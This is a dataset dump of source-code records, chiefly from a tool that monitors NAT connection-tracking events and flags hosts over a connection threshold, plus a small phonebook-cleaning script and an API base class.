"blob_id": "08db2e672a4e22ce699aa328125c9a4e3b5fecce",
"content_id": "8e7c9870e0d548dc5130b242839e489ec972fca5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 820,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 31,
"path": "/eventlistener/apis/base.py",
"repo_name": "ggm1207/Observer_KR",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\nimport os.path as p\n\nabs_dir = p.join(p.abspath(__file__), '..')\nsys.path.append(p.join(abs_dir, '..', '..'))\nfrom utils import parsingFile\n\nclass BaseApi:\n def __init__(self, name):\n self.api_login = parsingFile(p.abspath(p.join(abs_dir, '..', '..', 'config', 'api')))\n self.isLogin = False\n if self.api_login[name]['use']:\n self.login()\n self.isLogin = True\n\n def login(self):\n raise NotImplementedError\n\n def parsing(self, datas):\n if self.isLogin:\n if datas['type'] == 'keyword':\n self._parsing_keyword(datas)\n else:\n self._parsing_url(datas)\n\n def _parsing_keyword(self):\n raise NotImplementedError\n \n def _parsing_url(self):\n raise NotImplementedError\n"
}
] | 9 |
adexcell/Regular-expressions
|
https://github.com/adexcell/Regular-expressions
|
41a3644923e069aad04aaffca53cd01bc967055e
|
3224c3d280dc0c06eb225c05c60905ee2d4cea4a
|
2d306193c6df0095b4ba5388599bada014e23b96
|
refs/heads/master
| 2020-05-02T22:34:28.956004 | 2019-03-28T17:53:23 | 2019-03-28T17:53:23 | 178,255,562 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4821085035800934,
"alphanum_fraction": 0.5098114609718323,
"avg_line_length": 29.940475463867188,
"blob_id": "5aad8ea935f846b09e2d8825cdcab5b457099f65",
"content_id": "e1524363128119dbd13bda5373f2007755cfdb15",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2608,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 84,
"path": "/main.py",
"repo_name": "adexcell/Regular-expressions",
"src_encoding": "UTF-8",
"text": "import csv\nimport re\n\nfrom pprint import pprint\n\n\ndef open_csv():\n with open('phonebook_raw.csv', encoding='UTF-8') as f:\n rows = csv.reader(f, delimiter=\",\")\n contacts_list = list(rows)\n return contacts_list\n\n\ndef rewriting_fio(contacts_list):\n for contact in contacts_list[1:]:\n position_1 = contact[0].split(' ')\n if len(position_1) == 3:\n contact[0] = position_1[0]\n contact[1] = position_1[1]\n contact[2] = position_1[2]\n elif len(position_1) == 2:\n contact[0] = position_1[0]\n contact[1] = position_1[1]\n else:\n pass\n position_2 = contact[1].split(' ')\n if len(position_2) == 2:\n contact[1] = position_2[0]\n contact[2] = position_2[1]\n else:\n pass\n return contacts_list\n\n\ndef pretty_phone(some_list):\n pattern_to_find = re.compile(\n '(\\+?\\d)(\\s{0,3})\\(?(\\d{3})\\)?(\\s{0,3})\\-?(\\d{3})\\-?(\\d{2})\\-?(\\d{2})(\\s{0,3})\\(?(доб.)?(\\s{0,3})(\\d{4})?\\)?'\n )\n for contact in some_list:\n if 'доб.' in contact[-2]:\n new_phone = pattern_to_find.sub(r'+7(\\3)\\5-\\6-\\7 доб.\\11', contact[-2])\n else:\n new_phone = pattern_to_find.sub(r'+7(\\3)\\5-\\6-\\7', contact[-2])\n contact[-2] = new_phone\n return some_list\n\n\ndef del_duplicates(some_list):\n in_list = list()\n clean_phonebook = list()\n clean_phonebook.append(some_list[0])\n for contact in sorted(some_list[1:]):\n if contact[0] in in_list:\n for clean_contact in sorted(clean_phonebook):\n if clean_contact[0] == contact[0]:\n counter = 0\n for value in contact:\n if value in clean_contact:\n counter += 1\n pass\n else:\n clean_contact[counter] = value\n counter += 1\n else:\n pass\n else:\n clean_phonebook.append(contact)\n in_list.append(contact[0])\n return clean_phonebook\n\n\ndef write_csv(ready_list):\n with open(\"pretty_phonebook.csv\", \"w\", encoding='UTF-8') as f:\n data_writer = csv.writer(f, delimiter=',')\n data_writer.writerows(ready_list)\n\n\nif __name__ == '__main__':\n contacts_list = open_csv()\n pretty_fio_list = rewriting_fio(contacts_list)\n pretty_phones_list = pretty_phone(pretty_fio_list)\n clean_list = del_duplicates(pretty_phones_list)\n pprint(clean_list)\n write_csv(clean_list)\n"
}
] | 1 |
travis-ci/nat-conntracker
|
https://github.com/travis-ci/nat-conntracker
|
cac092940812566393fd47b7ec2eabfe3ec4cd11
|
1a517aae05b4d53ae5ffdf813b15efdbee5e46a2
|
692e9eabe7d712be8ae4ee66f66069d2b60d70aa
|
refs/heads/master
| 2021-04-28T01:40:22.763659 | 2018-06-26T16:36:22 | 2018-06-26T16:36:22 | 122,285,510 | 2 | 0 |
MIT
| 2018-02-21T02:55:39 | 2018-05-10T08:40:26 | 2018-06-26T16:36:22 |
Python
|
[
{
"alpha_fraction": 0.5874999761581421,
"alphanum_fraction": 0.6206521987915039,
"avg_line_length": 21.16867446899414,
"blob_id": "10976ba4b25563aa9bbea12992836b0be533ab2c",
"content_id": "0205dab18e8425adc2706d63ea177f668fd2d565",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1840,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 83,
"path": "/tests/redis_syncer_test.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "import json\nimport logging\n\nfrom nat_conntracker.redis_syncer import RedisSyncer\n\nimport pytest\n\n\[email protected]\ndef syncer():\n return RedisSyncer(\n logging.getLogger(__name__), 'nat-conntracker-tests:sync')\n\n\ndef test_redis_syncer_init(syncer):\n assert syncer is not None\n\n\ndef test_redis_syncer_pub(syncer, monkeypatch):\n published = []\n\n def mock_publish(*args):\n published.append(args)\n\n monkeypatch.setattr(syncer._conn, 'publish', mock_publish)\n syncer.pub(99, '127.0.0.1', '169.254.169.254', 14)\n\n assert len(published) > 0\n assert published[0][1] is not None\n\n msg = json.loads(published[0][1])\n\n assert msg == {\n 'threshold': 99,\n 'src': '127.0.0.1',\n 'dst': '169.254.169.254',\n 'count': 14\n }\n\n\nclass MockPubSubConn(object):\n def __init__(self):\n self.subscriptions = None\n\n def subscribe(self, **kwargs):\n self.subscriptions = kwargs\n\n def get_message(self):\n pass\n\n\ndef test_redis_syncer_sub(syncer, monkeypatch):\n mpsconn = MockPubSubConn()\n\n def mock_pubsub(*args, **kwargs):\n return mpsconn\n\n monkeypatch.setattr(syncer._conn, 'pubsub', mock_pubsub)\n syncer.sub(is_done=(lambda: True))\n\n assert mpsconn.subscriptions is not None\n assert mpsconn.subscriptions[syncer._channel] is not None\n\n\ndef test_redis_syncer_ping(syncer):\n assert syncer.ping() == b'PONG'\n\n\ndef test_redis_syncer_handle_message(syncer):\n assert syncer._handle_message({'type': 'not-a-message'}) is None\n bogus = syncer._handle_message({\n 'type': 'message',\n 'data': '{\"bogus\":true}'\n })\n assert bogus is None\n\n ok = syncer._handle_message({\n 'type':\n 'message',\n 'data':\n b'{\"threshold\":5,\"src\":\"10.9.8.7\",\"dst\":\"1.3.3.7\",\"count\":40}'\n })\n assert ok is None\n"
},
{
"alpha_fraction": 0.8157894611358643,
"alphanum_fraction": 0.8157894611358643,
"avg_line_length": 37,
"blob_id": "062a66eb35b5c1314a9faf91f135f632f07306b4",
"content_id": "77d13e5b9e5cd15d49cdf7bd5fa716d4405ef876",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 38,
"license_type": "permissive",
"max_line_length": 37,
"num_lines": 1,
"path": "/nat_conntracker/__init__.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "# this space intentionally left blank\n"
},
{
"alpha_fraction": 0.5504814982414246,
"alphanum_fraction": 0.5591798424720764,
"avg_line_length": 30.558822631835938,
"blob_id": "2e3e557256042ffbbd7ffea14716d46c4da61bea",
"content_id": "2520541eeaced7a01f044b7226f777553e275901",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9657,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 306,
"path": "/nat_conntracker/__main__.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport argparse\nimport logging\nimport os\nimport sys\n\nfrom urllib.parse import unquote_plus\nfrom ipaddress import ip_network\n\nfrom .conntracker import Conntracker\nfrom .mem_settings import MemSettings\nfrom .null_healther import NullHealther\nfrom .null_syncer import NullSyncer\nfrom .runner import Runner\nfrom .stats import Stats\n\ntry:\n import pkg_resources\n VERSION = pkg_resources.get_distribution('nat_conntracker').version\nexcept Exception:\n VERSION = 'unknown'\n\n__all__ = ['main']\n\nPRIVATE_NETS = (\n ip_network('10.0.0.0/8'),\n ip_network('127.0.0.0/8'),\n ip_network('169.254.0.0/16'),\n ip_network('172.16.0.0/12'),\n ip_network('192.0.2.0/24'),\n ip_network('192.168.0.0/16'),\n)\n\nARG_DEFAULTS = (\n ('conn_threshold', 100),\n ('debug', False),\n ('dst_ignore_cidrs', ('127.0.0.1/32', )),\n ('eval_interval', 60),\n ('events', sys.stdin),\n ('gesund_checks_enabled', False),\n ('gesund_namespace', 'gesund-0'),\n ('include_privnets', False),\n ('log_file', ''),\n ('max_stats_size', 1000),\n ('redis_url', ''),\n ('src_ignore_cidrs', ('127.0.0.1/32', )),\n ('sync_channel', 'nat-conntracker:sync'),\n ('top_n', 10),\n)\n\n\ndef main(sysargs=sys.argv[:]):\n parser = build_argument_parser(os.environ)\n args = parser.parse_args(sysargs[1:])\n _handle_misc_printing(args.print_service, args.print_wrapper)\n\n runner = build_runner(**args.__dict__)\n runner.run()\n return 0\n\n\ndef build_runner(**kwargs):\n args = dict(ARG_DEFAULTS)\n args.update(kwargs)\n\n logging_level = logging.INFO\n if args['debug']:\n logging_level = logging.DEBUG\n\n log_format = 'time=%(asctime)s level=%(levelname)s %(message)s'\n if VERSION != 'unknown':\n log_format = f'v={VERSION} {log_format}'\n\n logging_args = dict(\n level=logging_level, format=log_format, datefmt='%Y-%m-%dT%H:%M:%S%z')\n\n if args['log_file']:\n logging_args['filename'] = args['log_file']\n\n logging.basicConfig(**logging_args)\n logger = logging.getLogger(__name__)\n\n syncer = NullSyncer()\n settings = MemSettings()\n healther = NullHealther()\n if args.get('redis_url', ''):\n from .redis_syncer import RedisSyncer\n syncer = RedisSyncer(\n logger, args['sync_channel'], conn_url=args['redis_url'])\n\n from .redis_settings import RedisSettings\n settings = RedisSettings(conn_url=args['redis_url'])\n\n logger.info('using redis syncer and settings')\n\n if args.get('gesund_checks_enabled', False):\n from .gesunde_freundschaft import GesundeFreundschaft\n healther = GesundeFreundschaft(\n conn_url=args['redis_url'],\n redis_namespace=args['gesund_namespace'])\n\n src_ign = None\n dst_ign = None\n if args['include_privnets']:\n src_ign = ()\n dst_ign = ()\n\n for src_item in args['src_ignore_cidrs']:\n if src_item == 'private':\n src_ign = (src_ign or ()) + PRIVATE_NETS\n continue\n src_ign = (src_ign or ()) + (ip_network(src_item), )\n\n for dst_item in args['dst_ignore_cidrs']:\n if dst_item == 'private':\n dst_ign = (dst_ign or ()) + PRIVATE_NETS\n continue\n dst_ign = (dst_ign or ()) + (ip_network(dst_item), )\n\n settings.ping()\n syncer.ping()\n healther.ping()\n\n for net in src_ign:\n logger.info(f'adding src ignore={net}')\n settings.add_ignore_src(net)\n\n for net in dst_ign:\n logger.info(f'adding dst ignore={net}')\n settings.add_ignore_dst(net)\n\n conntracker = Conntracker(\n logger,\n syncer,\n settings,\n healther,\n Stats(max_size=args['max_stats_size']))\n\n return Runner(conntracker, syncer, logger, **dict(args))\n\n\ndef build_argument_parser(env, defaults=None):\n defaults = defaults if defaults is not None else dict(ARG_DEFAULTS)\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument(\n '-V', '--version', action='version', version=f'%(prog)s {VERSION}')\n parser.add_argument(\n 'events',\n nargs='?',\n type=argparse.FileType('r'),\n default=defaults['events'],\n help='input event XML stream or filename')\n parser.add_argument(\n '-T',\n '--conn-threshold',\n type=int,\n default=int(\n env.get('NAT_CONNTRACKER_CONN_THRESHOLD',\n env.get('CONN_THRESHOLD', defaults['conn_threshold']))),\n help='connection count threshold for message logging')\n parser.add_argument(\n '-n',\n '--top-n',\n default=int(\n env.get('NAT_CONNTRACKER_TOP_N', env.get('TOP_N',\n defaults['top_n']))),\n type=int,\n help='periodically sample the top n counted connections')\n parser.add_argument(\n '-S',\n '--max-stats-size',\n type=int,\n default=int(\n env.get('NAT_CONNTRACKER_MAX_STATS_SIZE',\n env.get('MAX_STATS_SIZE', defaults['max_stats_size']))),\n help='max number of src=>dst:dport counters to track')\n parser.add_argument(\n '-l',\n '--log-file',\n type=unquote_plus,\n default=unquote_plus(\n env.get('NAT_CONNTRACKER_LOG_FILE',\n env.get('LOG_FILE', defaults['log_file']))),\n help='optional separate file for logging')\n parser.add_argument(\n '-R',\n '--redis-url',\n type=unquote_plus,\n default=unquote_plus(\n env.get('NAT_CONNTRACKER_REDIS_URL',\n env.get('REDIS_URL', defaults['redis_url']))),\n help='redis URL for syncing conntracker')\n parser.add_argument(\n '-C',\n '--sync-channel',\n type=unquote_plus,\n default=unquote_plus(\n env.get('NAT_CONNTRACKER_SYNC_CHANNEL',\n env.get('SYNC_CHANNEL', defaults['sync_channel']))),\n help='redis channel name to use for syncing')\n parser.add_argument(\n '-G',\n '--gesund-checks-enabled',\n action='store_true',\n default=_asbool(\n env.get(\n 'NAT_CONNTRACKER_GESUND_CHECKS_ENABLED',\n env.get('GESUND_CHECKS_ENABLED',\n defaults['gesund_checks_enabled']))),\n help='enable redis-based health check integration with gesund')\n parser.add_argument(\n '-N',\n '--gesund-namespace',\n default=env.get(\n 'NAT_CONNTRACKER_GESUND_NAMESPACE',\n env.get('GESUND_NAMESPACE', defaults['gesund_namespace'])),\n help='redis namespace to use when communicating with gesund')\n parser.add_argument(\n '-I',\n '--eval-interval',\n type=int,\n default=int(\n env.get('NAT_CONNTRACKER_EVAL_INTERVAL',\n env.get('EVAL_INTERVAL', defaults['eval_interval']))),\n help='interval at which stats will be evaluated')\n parser.add_argument(\n '-s',\n '--src-ignore-cidrs',\n action='append',\n type=unquote_plus,\n default=list(\n filter(lambda s: s.strip() != '', [\n unquote_plus(s.strip()) for s in env.get(\n 'NAT_CONNTRACKER_SRC_IGNORE_CIDRS',\n env.get('SRC_IGNORE_CIDRS', defaults['src_ignore_cidrs']\n [0])).split(',')\n ])),\n help='CIDR notation of source addrs/nets to ignore')\n parser.add_argument(\n '-d',\n '--dst-ignore-cidrs',\n action='append',\n type=unquote_plus,\n default=list(\n filter(lambda s: s.strip() != '', [\n unquote_plus(s.strip()) for s in env.get(\n 'NAT_CONNTRACKER_DST_IGNORE_CIDRS',\n env.get('DST_IGNORE_CIDRS', defaults['dst_ignore_cidrs']\n [0])).split(',')\n ])),\n help='CIDR notation of destination addrs/nets to ignore')\n parser.add_argument(\n '-P',\n '--include-privnets',\n action='store_true',\n default=_asbool(\n env.get('NAT_CONNTRACKER_INCLUDE_PRIVNETS',\n env.get('INCLUDE_PRIVNETS',\n defaults['include_privnets']))),\n help='include private networks when handling flows')\n parser.add_argument(\n '-D',\n '--debug',\n action='store_true',\n default=_asbool(\n env.get('NAT_CONNTRACKER_DEBUG', env.get('DEBUG',\n defaults['debug']))),\n help='enable debug logging')\n parser.add_argument(\n '--print-service',\n action='store_true',\n default=False,\n help='print systemd service definition and exit')\n parser.add_argument(\n '--print-wrapper',\n action='store_true',\n default=False,\n help='print wrapper script and exit')\n\n return parser\n\n\ndef _asbool(value):\n return str(value).lower().strip() in ('1', 'yes', 'on', 'true')\n\n\ndef _handle_misc_printing(print_service, print_wrapper):\n _top = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n printed_any = False\n\n for truth, filename in ((print_service, 'nat-conntracker.service'),\n (print_wrapper, 'nat-conntracker-wrapper')):\n if not truth:\n continue\n printed_any = True\n with open(os.path.join(_top, 'misc', filename)) as fp:\n print(fp.read(), end='')\n\n if printed_any:\n sys.exit(0)\n\n\nif __name__ == '__main__':\n sys.exit(main())\n"
},
{
"alpha_fraction": 0.4765184819698334,
"alphanum_fraction": 0.48090168833732605,
"avg_line_length": 27.51785659790039,
"blob_id": "33be1adbca5feb3715490f9523fcd0da48a66f9c",
"content_id": "53c0385646bce7c8f97ac67dcd262369145117f7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1597,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 56,
"path": "/nat_conntracker/stats.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "from collections import Counter, OrderedDict\nfrom threading import Lock\n\n__all__ = ['Stats']\n\n\nclass Stats(object):\n def __init__(self, max_size=1000):\n self.max_size = max_size\n self.counter = Counter()\n self.index = OrderedDict()\n self._lock = Lock()\n\n def __repr__(self):\n return '<{} max_size={!r}>'.format(self.__class__.__name__,\n self.max_size)\n\n def top(self, n=10):\n try:\n self._lock.acquire()\n ret = []\n for key, count in self.counter.most_common(n):\n (src, dst) = self.index[key]\n ret.append(((src.host, self._daddr(dst)), count))\n return ret\n finally:\n self._lock.release()\n\n def reset(self):\n try:\n self._lock.acquire()\n self.counter = Counter()\n self.index = OrderedDict()\n finally:\n self._lock.release()\n\n def add(self, src, dst):\n try:\n self._lock.acquire()\n while len(self.index) > self.max_size:\n item_key, _ = self.index.popitem(last=False)\n del self.counter[item_key]\n key = self._key(src, dst)\n self.counter[key] += 1\n self.index[key] = (src, dst)\n finally:\n self._lock.release()\n\n def _key(self, src, dst):\n return '{}_{}'.format(src.host, self._daddr(dst))\n\n def _daddr(self, dst):\n dport = dst.port\n if dport == '':\n dport = '?'\n return '{}:{}'.format(dst.host, dport)\n"
},
{
"alpha_fraction": 0.7323943376541138,
"alphanum_fraction": 0.7323943376541138,
"avg_line_length": 22.66666603088379,
"blob_id": "fc80d545c77ee0173317940a3e282e9a94e4fbd1",
"content_id": "e33a22adaf19e4c8745830de7b6346d167771b6d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 142,
"license_type": "permissive",
"max_line_length": 50,
"num_lines": 6,
"path": "/tests/flow_parser_test.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "from nat_conntracker.flow_parser import FlowParser\n\n\ndef test_flow_parser_init():\n flp = FlowParser(None, None)\n assert flp is not None\n"
},
{
"alpha_fraction": 0.5574712753295898,
"alphanum_fraction": 0.5603448152542114,
"avg_line_length": 22.200000762939453,
"blob_id": "6e7855a850ece54cb99f0ee8a3dc05bfd873162b",
"content_id": "b5de7ca8ed0aa59696a61e29760bdbacd920cada",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 696,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 30,
"path": "/nat_conntracker/mem_settings.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "from ipaddress import ip_network\n\n__all__ = ['MemSettings']\n\n\nclass MemSettings(object):\n def __init__(self):\n self._settings = {\n 'src_ignore': set(),\n 'dst_ignore': set(),\n 'min_flow': 10\n }\n\n def ping(self):\n pass\n\n def src_ignore(self):\n return list(self._settings['src_ignore'])\n\n def dst_ignore(self):\n return list(self._settings['dst_ignore'])\n\n def add_ignore_src(self, src):\n self._settings['src_ignore'].add(ip_network(str(src)))\n\n def add_ignore_dst(self, dst):\n self._settings['dst_ignore'].add(ip_network(str(dst)))\n\n def min_flow(self):\n return self._settings['min_flow']\n"
},
{
"alpha_fraction": 0.5961422324180603,
"alphanum_fraction": 0.623869776725769,
"avg_line_length": 26.649999618530273,
"blob_id": "0bd515464967041df689063a172050933df88640",
"content_id": "7590f74b51fa5b3fe48d5dcd2a9023942fa2849e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1659,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 60,
"path": "/tests/cli_test.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "import logging\nimport os\nimport sys\n\nfrom ipaddress import ip_address\n\nfrom nat_conntracker.__main__ import (build_argument_parser, build_runner,\n PRIVATE_NETS)\n\nISPY2 = sys.version_info.major == 2\nHERE = os.path.abspath(os.path.dirname(__file__))\n\n\ndef test_build_argument_parser():\n env = {'CONN_THRESHOLD': '99'}\n parser = build_argument_parser(env)\n assert parser is not None\n\n args = parser.parse_args([\n '--top-n=4', '-S', '499', '--log-file', '%2Fhuh%2Fwat.log', '-I24',\n '--include-privnets'\n ])\n\n assert args.top_n == 4\n assert args.conn_threshold == 99\n assert args.max_stats_size == 499\n assert args.log_file == '/huh/wat.log'\n assert args.eval_interval == 24\n assert args.include_privnets is True\n\n\nclass FakeArgs(object):\n def __init__(self):\n self.events = None\n self.conn_threshold = 100\n self.top_n = 10\n self.eval_interval = 1\n\n\ndef test_run_events_sample(caplog):\n events = open(\n os.path.join(HERE, 'data', 'conntrack-events-sample.xml'), 'r')\n runner = build_runner(events=events, conn_threshold=100, debug=True)\n with caplog.at_level(logging.DEBUG):\n runner.run()\n\n assert ' over threshold=100 src=10.10.0.7' in caplog.text\n assert ' adding' in caplog.text\n assert ' begin sample' in caplog.text\n assert ' end sample' in caplog.text\n assert ' cleaning up' in caplog.text\n\n\ndef test_private_nets():\n assert len(PRIVATE_NETS) > 0\n covers_local = False\n for net in PRIVATE_NETS:\n if ip_address('10.10.0.99') in net:\n covers_local = True\n assert covers_local\n"
},
{
"alpha_fraction": 0.72826087474823,
"alphanum_fraction": 0.72826087474823,
"avg_line_length": 22,
"blob_id": "97e343fa912c7d91efae8c00bd6e9548952eb4cc",
"content_id": "ad5520d85fc471a25c003d1736da21308b6e4066",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 92,
"license_type": "permissive",
"max_line_length": 41,
"num_lines": 4,
"path": "/bin/nat-conntracker",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport sys\nfrom nat_conntracker.__main__ import main\nsys.exit(main())\n"
},
{
"alpha_fraction": 0.5519053936004639,
"alphanum_fraction": 0.5624178647994995,
"avg_line_length": 27.185184478759766,
"blob_id": "ba6c3ffb1939e5aa47f98c02a7a3353e27a09fbb",
"content_id": "6957fec7690110f88c293caca714166a316ded5e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 761,
"license_type": "permissive",
"max_line_length": 68,
"num_lines": 27,
"path": "/nat_conntracker/gesunde_freundschaft.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "import redis\n\n__all__ = ['GesundeFreundschaft']\n\n\nclass GesundeFreundschaft:\n def __init__(self,\n conn_url='redis://localhost:6379/0',\n redis_namespace='gesund-0'):\n self._conn = redis.from_url(conn_url)\n self._ns = redis_namespace\n self._marked = set()\n\n def ping(self):\n self._conn.ping()\n\n def cleanup(self):\n for key in self._marked:\n self._conn.srem(f'{self._ns}:health-checks', key)\n\n def healthy(self, key, ttl=60):\n self._marked.add(key)\n self._conn.sadd(f'{self._ns}:health-checks', key)\n self._conn.setex(f'{self._ns}:health-check:{key}', 'y', ttl)\n\n def unhealthy(self, key):\n self._conn.delete(f'{self._ns}:health-check:{key}')\n"
},
{
"alpha_fraction": 0.6270325183868408,
"alphanum_fraction": 0.6280487775802612,
"avg_line_length": 24.894737243652344,
"blob_id": "6dd9b612065711ab70679f7550457264c730a422",
"content_id": "cc16ed3ed4c82c48ca56734320d572464cea499a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 984,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 38,
"path": "/systemd-wrapper",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n# systemd wrapper script expected to be installed at ___SYSTEMD_WRAPPER___ for\n# use by adjacent systemd.service file\nset -o errexit\nset -o pipefail\n\nmain() {\n local name=\"${1:-nat-conntracker}\"\n\n eval \"$(tfw printenv nat-conntracker)\"\n\n : \"${NAT_CONNTRACKER_CONNTRACK_ARGS:=-o+xml+-E+conntrack}\"\n : \"${NAT_CONNTRACKER_SELF_IMAGE:-travisci/nat-conntracker:master}\"\n\n docker stop \"${name}\" &>/dev/null || true\n docker rm -f \"${name}\" &>/dev/null || true\n\n local env_file\n env_file=\"$(tfw writeenv nat-conntracker \"${name}\")\"\n\n local conntrack_args\n conntrack_args=\"$(tfw urldecode \"${NAT_CONNTRACKER_CONNTRACK_ARGS}\")\"\n\n local conntrack_command=\"conntrack ${conntrack_args}\"\n ${conntrack_command} |\n docker run \\\n --rm \\\n --user nobody \\\n --interactive \\\n --attach STDIN \\\n --attach STDOUT \\\n --attach STDERR \\\n --name \"${name}\" \\\n --env-file \"${env_file}\" \\\n \"${NAT_CONNTRACKER_SELF_IMAGE}\"\n}\n\nmain \"$@\"\n"
},
{
"alpha_fraction": 0.7022727131843567,
"alphanum_fraction": 0.7022727131843567,
"avg_line_length": 24.882352828979492,
"blob_id": "30c198dcf8d974164921daad86cc602cc5a7bc3b",
"content_id": "b259cad82fa920f3cad41eb540fd32da19e520d0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 440,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 17,
"path": "/README.rst",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "NAT Conntracker\n===============\n\n.. image:: https://travis-ci.org/travis-ci/nat-conntracker.svg?branch=master\n :target: https://travis-ci.org/travis-ci/nat-conntracker\n\n.. image:: https://codecov.io/gh/travis-ci/nat-conntracker/branch/master/graph/badge.svg\n :target: https://codecov.io/gh/travis-ci/nat-conntracker\n\nTracking some conns!\n\nUsage\n-----\n\nPipe in some conntrack XML::\n\n conntrack -o xml -E conntrack | nat-conntracker -\n"
},
{
"alpha_fraction": 0.7237149477005005,
"alphanum_fraction": 0.7254672646522522,
"avg_line_length": 23.457143783569336,
"blob_id": "d2dd884d788f9a349d0bffefe8c8a95267b4dc38",
"content_id": "4b7266d8840e6c0743e6c282f26328de0be323ef",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 1712,
"license_type": "permissive",
"max_line_length": 93,
"num_lines": 70,
"path": "/Makefile",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "PACKAGE := nat_conntracker\nEXEC_PREFIX ?= /usr/local\nCONFIG_PREFIX ?= /etc\n\nGIT_DESCRIBE ?= $(shell git describe --always --dirty --tags)\nDOCKER_TAG ?= travisci/nat-conntracker:$(GIT_DESCRIBE)\n\nDOCKER ?= docker\nPIP ?= pip3\nPYTHON ?= python3\n\nTESTDATA := tests/data/conntrack-events-sample.xml\n\n.PHONY: all\nall: clean deps fmt coverage\n\n.PHONY: clean\nclean:\n\t$(RM) -r $(TESTDATA) htmlcov .coverage\n\n.PHONY: deps\ndeps: $(TESTDATA)\n\t$(PIP) install -r requirements.txt\n\n.PHONY: fmt\nfmt:\n\tyapf -i -vv $(shell git ls-files '*.py') bin/nat-conntracker\n\n.PHONY: install\ninstall:\n\t$(PIP) install --upgrade --ignore-installed $(PWD)\n\n.PHONY: coverage\ncoverage: htmlcov/index.html\n\n.PHONY: test\ntest:\n\t$(PYTHON) setup.py pytest --addopts=\"--cov=$(PACKAGE)\"\n\n\nhtmlcov/index.html: .coverage\n\tcoverage html\n\n.coverage: test\n\n# The sysinstall target is expected to be run by a user with write access to the\n# CONFIG_PREFIX and EXEC_PREFIX sub-directories used below, as well as the\n# ability to run systemctl commands, such as root. :scream_cat:\n.PHONY: sysinstall\nsysinstall: install\n\ttouch $(CONFIG_PREFIX)/default/nat-conntracker\n\tcp -v ./misc/nat-conntracker.service $(CONFIG_PREFIX)/systemd/system/nat-conntracker.service\n\tcp -v ./misc/nat-conntracker-wrapper $(EXEC_PREFIX)/bin/nat-conntracker-wrapper\n\tsystemctl enable nat-conntracker\n\n.PHONY: docker-build\ndocker-build:\n\t$(DOCKER) build -t=\"$(DOCKER_TAG)\" .\n\n.PHONY: docker-login\ndocker-login:\n\t@echo \"$(DOCKER_LOGIN_PASSWORD)\" | \\\n\t\t$(DOCKER) login --username \"$(DOCKER_LOGIN_USERNAME)\" --password-stdin\n\n.PHONY: docker-push\ndocker-push:\n\t$(DOCKER) push \"$(DOCKER_TAG)\"\n\ntests/data/conntrack-events-sample.xml: tests/data/conntrack-events-sample.xml.bz2\n\tbzcat $^ >$@\n"
},
{
"alpha_fraction": 0.5277973413467407,
"alphanum_fraction": 0.534130871295929,
"avg_line_length": 28.60416603088379,
"blob_id": "752e94d27746d028affa49d5b7b941d170af2692",
"content_id": "2261832f0a03d8486703eeff19fdd072d22a577e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1421,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 48,
"path": "/nat_conntracker/redis_syncer.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
